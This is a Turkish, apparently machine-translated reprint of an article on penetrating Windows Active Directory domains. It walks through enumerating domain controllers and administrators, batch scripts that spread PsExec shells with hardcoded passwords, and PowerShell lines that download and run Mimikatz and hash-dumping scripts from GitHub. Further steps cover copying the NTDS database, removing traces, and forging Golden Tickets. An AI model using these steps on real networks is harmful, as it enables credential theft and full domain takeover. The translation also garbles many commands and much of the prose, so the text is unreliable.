Kuru ürünler! İntranet sızma testinin etki alanı penetrasyonunun ayrıntılı açıklaması! Toplamak!
Sızma testi sürecinde, genellikle aşağıdaki senaryolarla karşılaşırız: Bir etki alanındaki bir sunucu, dış dünyaya web hizmetleri sağlamak için yönlendirme yoluyla bağlantı noktası eşlemesi gerçekleştirir. Ana bilgisayarın sistem izinlerini bir web komut dosyası güvenlik açığı aracılığıyla elde ettik. Kurumun karşı karşıya kaldığı büyük riskleri kanıtlamak için intranet sızma testi gereklidir.Şu anda intranetin etki alanına girmesi gereklidir.
Genellikle, etki alanı denetleyicisinin yetkisini elde etmeyi hedefliyoruz, çünkü etki alanı denetleyicisi düştüğünde, tüm intranet denetim altındadır. Etki alanı penetrasyonunu öğrenmeden önce, bazı temel bilgileri anlamamız gerekir. "Anzi Sınıfı ", ISEC laboratuvarından Qin öğretmeni herkese tek tek açıkladı.
1. Alan nedir
Merkezi yönetim için ağdaki birden çok bilgisayarı mantıksal olarak düzenleyin. Çalışma grubundan farklı olan bu mantıksal ortama etki alanı adı verilir. Etki alanı, kuruluşun ve depolama kaynaklarının temel yönetim birimidir. Etki alanında en az bir etki alanı denetleyicisi vardır. Etki alanı denetleyicisi, tüm etki alanı için kullanıcı hesaplarını ve güvenlik veritabanlarını depolar.
Şekil 1
Peki alan ağı yapısının avantajları nelerdir? Alan adlarının avantajları temel olarak aşağıdaki gibidir:
1. Yetki yönetimi nispeten merkezileştirilir ve yönetim maliyeti azalır
Bir etki alanı ortamında, kullanıcılar dahil olmak üzere tüm ağ kaynakları, merkezi yönetim için uygun olan etki alanı denetleyicisinde tutulur.Tüm kullanıcıların, etki alanında oturum açtıkları sürece etki alanı içinde kimlik doğrulaması yapılabilir ve yöneticiler, bilgisayar kaynaklarını daha iyi yönetebilir. Ağı yönetmenin maliyeti büyük ölçüde azalır; aynı zamanda, etki alanı ortamında, kurumsal çalışanların etki alanı üyesi ana bilgisayarlara yazılım yüklemesini önleyebilir, müşteri güvenliğini artırabilir, müşteri hatalarını azaltabilir ve bakım maliyetlerini azaltabilir.
2. Gelişmiş gizlilik
İşletmenin bazı gizli bilgilerinin yönetimine elverişlidir.Kaynağın yetkisini bireysel olarak kontrol edebilir ve belirli alan hesabı tarafından kaynak talebine izin verebilir veya reddedebilir.
3. Gelişmiş güvenlik
Gezici hesaplar ve klasör yeniden yönlendirme kullanılarak, kişisel hesapların iş dosyaları ve verileri, birleşik yedekleme ve yönetim için sunucuda depolanabilir, böylece kullanıcı verileri daha güvenli ve garantili olur; aynı zamanda, etki alanı denetleyicisi uygulamaları ve sistem yamalarını dağıtabilir, Kullanıcılar yüklemeyi seçebilir veya sistem yöneticisi tarafından otomatik olarak kurulabilir, bu da veri ve sistem güvenliğini büyük ölçüde artırır.
4. Geliştirilmiş rahatlık
Yönetici, oturum açma komut dosyası eşlemesini atayabilir.Kullanıcı oturum açtıktan sonra, parolayı tekrar girmek zorunda kalmadan yerel bir sürücü harfi gibi ağdaki kaynakları kullanabilir.
Yukarıdaki nedenlere bağlı olarak, birçok işletme intranetlerinde etki alanı ortamını benimseyecektir.Bu nedenle, nitelikli bir sızma test cihazı olarak, etki alanı penetrasyonunun geleneksel fikir ve becerilerine hakim olunmalıdır.
İkincisi, alanın özellikleri
Etki alanı üyesi bilgisayar, oturum açarken etki alanında veya bu bilgisayarda oturum açmayı seçebilir. Etki alanında oturum açarken, kimlik doğrulama, Kerberos protokolü kullanılarak etki alanı denetleyicisinde gerçekleştirilir. Bu bilgisayarda oturum açıldığında, NTLM kimlik doğrulaması SAM aracılığıyla gerçekleştirilir. , Aşağıda gösterildiği gibi:
şekil 2
Varsayılan olarak, etki alanı kullanıcıları etki alanı denetleyicileri hariç etki alanındaki tüm iş istasyonlarında oturum açabilir. Yöneticiler ayrıca belirli bilgisayarları da belirleyebilir. Etki alanı kullanıcı bilgileri aşağıdaki şekilde gösterildiği gibi Active Directory'de depolanır:
resim 3
Üç, alan adı penetrasyon fikirleri
Belirli bir ölçekteki bir işletme, her gün çalışan girişi ve istifasıyla karşılaşabilir. Bu nedenle, ağ yönetimi departmanının genellikle etki alanı üyesi ana bilgisayarları diskteki dosyaları ortadan kaldırmak için biçimlendirmesi ve ardından yeni çalışanların kullanımına sunmak için sistemi ve yazılımı yeniden yüklemesi gerekir; bu nedenle, Daha sonraki geçişi kolaylaştırmak için, çoğu ağ yöneticisi bir sistem yansıtma diski oluşturacak, tüm bilgisayarları tek tip olarak kuracak ve kurulum sırasında alışılmış veya hatta birleşik bir şifre belirleyecektir.
Bu nedenle, etki alanındaki bilgisayarın yerel yönetici hesabının etki alanındaki daha fazla bilgisayara giriş yapma olasılığı çok yüksektir. Yerel yöneticinin parolasının daha sonra sunucuda değiştirilme olasılığı, kişisel bir ofis bilgisayarındakinden çok daha düşükken, bir etki alanı kullanıcısı olasılığı İzinler düşüktür ve etki alanı üyesi ana bilgisayarlara yazılım yüklemek imkansızdır.Aşağıdaki sahne gerçekleşecektir:
Bir etki alanı kullanıcısının çizim işlemleri için viso yazılımını kullanması gerekir, bu nedenle kurulum için ağ yöneticisine başvurdu.Ağ yöneticisi etki alanı üyesi ana bilgisayarda bir etki alanı yöneticisi olarak oturum açtı ve viso yazılımı yüklemesine yardımcı oldu, böylece bu çalışan bilgisayar bilgisine sahip, Kimliği değiştirip yerel bilgisayarın yöneticisine giriş yaptıktan sonra mimikatz uyguladı, etki alanı yöneticisinin parolasını bellekten aldı ve tüm etki alanını başarıyla kontrol etti.
Bu nedenle, etki alanına girme fikri, etki alanı üye ana bilgisayarları aracılığıyla etki alanı denetleyicisi IP'sini ve etki alanı yöneticisi hesabını bulmak, etki alanı üye ana bilgisayarlarını penetrasyon kapsamını genişletmek için sıçrama tahtası olarak kullanmak ve etki alanı yöneticilerinin etki alanındaki herhangi bir üye ana bilgisayarda oturum açabilecekleri özelliği kullanmaktır. Etki alanı yöneticisinin oturum açtığı ana bilgisayar IP'sini bulun, etki alanı yöneticisi parolasını etki alanı üyesi ana bilgisayarın belleğinden atmaya çalışın ve ardından etki alanı denetleyicisini kaldırıp tüm intranete nüfuz edin.
Etki alanına giriş için dört genel talimat
Aşağıdaki talimatların tümü, etki alanı üyesi ana makinede gerçekleştirilen yürütmenin sonucudur.
Etki alanı denetleyicisinin IP'sini alın: dsquery sunucusu
Şekil 4
Etki alanı denetleyicisinin ana bilgisayar adını alın: net group "etki alanı denetleyicileri" / etki alanı. Aşağıdaki şekilde gösterildiği gibi, bu komutla elde edilen makine adından sonra bir $ işareti olacağını unutmayın:
Şekil 5
Sorgu alanı yönetimi kullanıcıları: net grup "alan yöneticileri" / alan adı
Şekil 6
Tüm etki alanı kullanıcılarını görüntüleyin: net kullanıcı / etki alanı
Şekil 7
Krbtgt adında özel bir kullanıcı var. Bu kullanıcı, Kerberos kimlik doğrulaması için kullanılan bir hesaptır. Kullanıcının hash'i elde edildiğinde, bilet bir bilet aktarım saldırısı gerçekleştirmek üzere sahte olabilir. Ayrıca, aşağıda birkaç yaygın komut vardır:
Mevcut oturum açma etki alanını sorgulayın: net config workstation
Sorgu etki alanı şifre politikası: net hesaplar / etki alanı
Yama bilgilerini görüntüleyin: wmic qfe
İşletim sistemi türünü görüntüleyin: wmic os
Yerel yönetici haklarına sahip bir hesap aldığımızda, bu hesap üzerinden intranetteki diğer ana bilgisayarlara erişmek isteriz. Yaygın yöntemler arasında, Ipc $ bağlantısı kurmak için net kullanım, wmic komut bağlantısı, rdp bağlantısı ve tabii ki "bilgisayar" da kullanabilirsiniz. Ek olarak, aşağıda gösterildiği gibi uzaktan bağlanmak için psexec kullanmayı tercih ediyorum:
Figür 8
Tek tek manuel olarak bağlanmanın zahmetli olduğunu düşünüyorsanız, gruplar halinde de bağlanabilir ve cmdshell'i gruplar halinde geri döndürebilirsiniz. Aşağıdaki toplu işlemeyi kullanabilirsiniz:
@Eko kapalı
echo ip adres yapılandırma dosyasını kontrol et ...
yoksa ip.txt echo ip adres yapılandırma dosyası ip.txt mevcut değil! ve goto end
echo okuma ve analiz dosyası ...
/ F eol = # için %% i (ip.txt) için PsExec.exe \ %% i -accepteula -u yönetici -p 123456 cmd ve cmd / c PsExec.exe \ %% 'yi başlatın i -u yönetici -p 123456 cmd
:son
çıkış
Resim 9
Cmdshell'e döndükten sonra, alan yöneticisinin şifresini almak için belleği tek tek okuyabiliriz.Burada, dosyaları yüklemeden hızlı işlemler gerçekleştirmek için powershell ile birleştirebiliriz:
Düz metni alın:
powershell IEX (New-Object Net.WebClient) .DownloadString (https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 ); Invoke-Mimikatz DumpCerts
Hash'i alın:
powershell IEX (New-Object Net.WebClient) .DownloadString (https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1); Get-PassHashes
Bu yöntemin avantajı, etki alanı yöneticisi hedef bilgisayarda oturum açtığı sürece oturum kapatılsa bile parolanın bellekten okunabilmesi, ancak gerçek sızma sürecinde genellikle verimliliği ararız. Oturum açmak için etki alanı yöneticisini hızlıca bulma Hangi bilgisayar kullanılmış ve hala aktif oturumlar var, öncelik daha yüksek, aşağıdaki komutu kullanabiliriz:
Resim 10
Burada ip.txt, üzerinden geçilmesi gereken IP listesidir, 1.bat'taki komut tasklist / v | "etki alanı yöneticisi" ni bulun, bu nedenle döndürülen cmdshell'de bir etki alanı yöneticisi oturumu olup olmadığını kontrol etmemiz gerekir, Varsa, etki alanı yöneticisinin ana bilgisayarda oturum açtığı ve bellek parolasının atılabileceği anlamına gelir.
Ek olarak, uzak ana bilgisayar görev listesini görüntülemek için Görev Listesi komutunu da kullanabiliriz; burada, aşağıda gösterildiği gibi, etki alanı yöneticisi sözcüklerini içeren görev listesini aramak için aynı şey geçerlidir:
Resim 11
Yukarıdaki ilkelere dayanarak, daha otomatik bir toplu işlem yazabiliriz:
@Eko kapalı
echo ip adres yapılandırma dosyasını kontrol et ...
yoksa ip.txt echo ip adres yapılandırma dosyası ip.txt mevcut değil! ve goto end
echo okuma ve analiz dosyası ...
/ F eol = # için %% i (ip.txt) için echo %% i (echo %% i görev listesi / s %% i / u yönetici / p mytest2010 / v) > > d: \ sonuç.txt
:son
çıkış
Yukarıdaki komutun işlevi, ip.txt'deki IP listesinde gezinmek için belirtilen kullanıcı adını ve parolayı kullanmak, görev listesini yazdırmak ve sonucu result.txt'ye çıkarmaktır.Yukarıdaki toplu işlemi gerçekleştirdikten sonra, yalnızca bir süre beklememiz ve sonunda gitmemiz gerekir. Result.txt dosyasının etki alanı yöneticisi kelimelerini içerip içermediğini kontrol edin, aşağıda gösterildiği gibi hangi ana makinelerin etki alanı yöneticisinin etkin oturumlarına sahip olduğunu belirleyebilirsiniz:
Resim 12
Beş, etki alanı kullanıcı karma çıkarma
Etki alanı kullanıcı hesapları, bir etki alanı veritabanı biçiminde Active Directory'de saklanır. Ntdsutil.exe, etki alanı denetleyicisi ile birlikte gelen bir etki alanı veritabanı yönetim aracıdır. Windows 2008'den varsayılan olarak gelir, böylece tüm etki alanlarını etki alanı veritabanından çıkarabiliriz. Etki alanı kullanıcı bilgileri için etki alanı veritabanını dışa aktarmak üzere etki alanı denetleyicisinde aşağıdaki komutları yürütün:
Ntdsutil snapshot ntds örneğini etkinleştirin oluşturma bağlama {guid} bağlama noktasını kopyalayın \ windows \ NTDS \ ntds.dit d: \ ntds_save.dit
Figür 13
Etki alanı veritabanı yüklendikten sonra, aşağıdaki şekilde gösterildiği gibi kopyalamaya başlayabilirsiniz:
Figür 14
Son olarak, keşfedilmekten kaçınmak için bağlama noktasını silmek için unmount {guid} --delete {guid} - çıkın, ardından QuarksPwDump aracını etki alanı denetleyicisine yükleyin ve ardından aşağıdaki şekilde gösterildiği gibi kullanıcı karmasını başarıyla çıkarmak için aşağıdaki komutu yürütün:
QuarksPwDump dump-hash-domain ntds-file d: \ ntds_save.dit
Figür 15
Yukarıdaki işlemlerin etki alanı denetleyicisinde gerçekleştirilmesi gerektiğini unutmayın, aksi takdirde aşağıdaki şekilde gösterildiği gibi etki alanı veritabanını açmak için karşılık gelen veritabanı motoru gerektiğinden aşağıdaki hata ortaya çıkar:
Figür 16
Yukarıdaki işlem yöntemine ek olarak, etki alanı denetleyicisindeki tüm kullanıcıların karmasını almak için bir mimikatz komutu da kullanabilirsiniz:
mimikatz günlüğü privilege :: debug lsadump :: lsa / patch
Figür 17
Altı, fatura teslim saldırısı
Etki alanındaki her kullanıcının bileti krbtgt parola karması tarafından hesaplanır ve oluşturulur; böylece krbtgt parola karmasını aldığımız sürece, bileti istediğimizde değiştirebilir ve ardından bileti etki alanı denetleyicisine giriş yapmak ve krbtgt kullanıcı karması tarafından oluşturulan bileti kullanmak için kullanabiliriz. Altın Bilet olarak bilinen bu tür saldırı yöntemine bilet teslimi saldırısı denir.
Öncelikle, aşağıda gösterildiği gibi ilgili alan yöneticisi hesabını, alan adını ve sid değerini değiştirmemiz gereken Altın Bilet'i oluşturalım:
Figür 18
Ardından bileti içe aktarmak için aşağıdaki komutu kullanırız:
Figür 19
İçe aktarma başarılı olduktan sonra, aşağıda gösterildiği gibi önbelleğe alınan biletleri görüntülemek için etki alanı üyesi ana bilgisayarda klist yürütürüz:
Resim 20
Son olarak, aşağıda gösterildiği gibi etki alanı kontrolüne giriş yapmak için bilet aktarımı saldırısını kullanabiliriz:
Figür 21
Bu nedenle, etki alanı yöneticisinin şifresi etki alanı sızma işlemi sırasında değiştirilmişse, krbtgt kullanıcısının geçmiş karmasını kullanarak bir bilet aktarım saldırısı gerçekleştirmeyi deneyebilirsiniz.Genel olarak, krbtgt kullanıcısının şifresini kimse değiştirmez.
Ek olarak, MS14-068 güvenlik açığı etki alanına sızma sürecinde kullanılabilir.Microsoft tarafından verilen yama kb3011780'dir. Sunucu 2000 üzerindeki etki alanı denetleyicilerinde, bu düzeltme eki uygulanmazsa durum daha kötü olur. Bu güvenlik açığını kullanmak Herhangi bir etki alanı kullanıcısı, son derece zararlı olan etki alanı yöneticisi yetkisine yükselir.
Yazar: Ann Xiamen Network Technology Co., Ltd. Yeniden basıldı: freebuf.com
